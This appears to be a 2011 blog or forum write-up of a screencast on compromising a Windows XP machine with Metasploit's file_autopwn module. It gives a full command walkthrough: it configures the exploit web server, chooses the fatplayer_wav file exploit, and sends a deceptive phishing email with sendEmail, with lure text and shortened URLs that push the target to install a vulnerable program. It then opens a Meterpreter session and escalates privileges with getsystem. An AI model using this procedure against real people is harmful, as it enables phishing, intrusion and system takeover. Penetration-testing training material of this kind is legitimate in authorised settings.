Watch video on-line: http://blip.tv/file/4924033
Download video: http://www.mediafire.com/?c97d39n4df5bqda
This screencast demonstrates metasploits ability to automatically generate vulnerable files which are read by a certain application to create an exploit.
After choosing a file to use, the attacker sends a email to the target with a masked URL to the vulnerable file and a link to the application, which is the "correct" version of it too!
Other examples of metasploits "autopwn" features: db_autopwn and browser_pwn
What do I need?
* Metasploit – (Can be found on BackTrack 4-R2). Download here
* SendEmail + SMTP details – (SendEmail can be found on BackTrack 4-R2). Download sendemail here
* URL shorter service – (Can be found by using a internet search engine).
* Start network services and obtain an IP address
* Start metasploit and configure file_autopwn
* Wait for web server to be active
* Browser available files and view information of that particular one.
* Discover homepage and download information
* Create masked URLs
* Socially engineer an email to the target with all the information
* Wait for target to download the file and load it in the program
* Game Over
Commands: *Due to the forums security, I'm unable to post the complete command list.*
Walk-throughCode:start-network dhclient eth0 clear msfconsole search autopwn use server/file_autopwn show options set LHOST 192.168.0.33 set SRVPORT 80 set URIPATH / #set SSL true #set ExitOnSession false show options #show advanced #set CREATEFILES false run Firefox -> 192.168.0.33 -> Ctrl + F -> fatplayer search fatplayer info windows/fileformat/fatplayer_wav sendEmail -f "*************************************" -t ***************************** -u "You've gonna listen to this" -m "O.M.G. CHECK THIS OUT. You HAVE to listen to this as soon as you can [URL] You'll need to grab this ([URL]) to listen to this." -s [smtp host] -xu [smtp user] -xp [smtp pass] #IE -> [target's online email] -> Login -> Download FatPlayer -> Install/Extract -> Click exploit link sessions -l -v sessions -i 1 sysinfo getuid getsystem getuid
The attacker approaches this attack differently by attacking desktop application installed on the operating system (OS) by using a collection of “file exploits”.
To start things, the attacker starts metasploit and locates the file_autopwn module. After examining the required information, the attacker proceeds by entering all the details which are needed. Once this has been done, the attacker sets metasploit to work by creating a mass of vulnerable files after which have been created metasploit set ups a web server which is the going to be used for the delivery method.
The attacker visits the web server themselves to see what is available. After choosing the program "fatplayer", they decide to increase their chance of success by finding the program's homepage so they can pass this information on to the target, which makes it "nice and easy" for the target to download and run.
The attacker needs to make sure that they send a vulnerable version of the program to the target however, so they check to see what information is given about the file exploit.
The attacker chooses to socially engineer the target by sending them a email with a link to the file setup and a brief description. To help increase success, the attacker masks the URL of both files by using URL shortening services. Once the target clicks on the shortened link, they are automatically redirected to the "longer URL".
The attacker just has to simply wait to see if the target "falls for it" and runs the exploit file.... which the target does. =)
* You will need to find/use your own SMTP details.
* You can use any number of URL shortening services.
* You could of used any files generated by metasploit.
* You could of attach the file instead of linking in the email (See here for a example), however alot of email services now have anti-virus checking built in...
Song: Sidney Samson (featuring Wizard Sleeve) - Riverside (Lets Go!) (Warren Clarke Remix)
Video length: 6:00
Capture length: 18:11
Blog Post: http://g0tmi1k.blogspot.com/2011/03/video-owning-windows-xp-sp3-vs.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/38998-%5Bvideo%5D-owning-windows-xp-sp3-vs-metasploits-file_autopwn.html#post192417